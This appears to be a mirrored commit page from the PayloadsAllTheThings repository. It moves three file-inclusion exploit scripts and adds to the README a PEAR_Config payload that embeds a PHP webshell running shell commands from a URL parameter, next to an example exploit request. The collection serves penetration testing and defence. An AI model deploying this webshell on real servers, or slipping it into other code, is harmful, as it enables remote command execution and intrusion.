ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 10:26:09 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

PEAR_Config example

Browse Source
This commit is contained in:
Swissky 2023-10-02 17:12:36 +02:00
parent 837f220264
commit 892c68e6e7
4 changed files with 7 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

0
File Inclusion/LFI2RCE.py → File Inclusion/Files/LFI2RCE.py
View File

0
File Inclusion/phpinfolfi.py → File Inclusion/Files/phpinfolfi.py
View File

0
File Inclusion/uploadlfi.py → File Inclusion/Files/uploadlfi.py
View File

7
File Inclusion/README.md
View File

@ -520,6 +520,13 @@ There are two ways to exploit it.
/vuln.php?file=/tmp/exec.php&c=id
```
The created configuration file contains the webshell.
```php
#PEAR_Config 0.9
a:2:{s:10:"__channels";a:2:{s:12:"pecl.php.net";a:0:{}s:5:"__uri";a:0:{}}s:7:"man_dir";s:29:"<?echo(system($_GET['c']));?>";}
```
## LFI to RCE via credentials files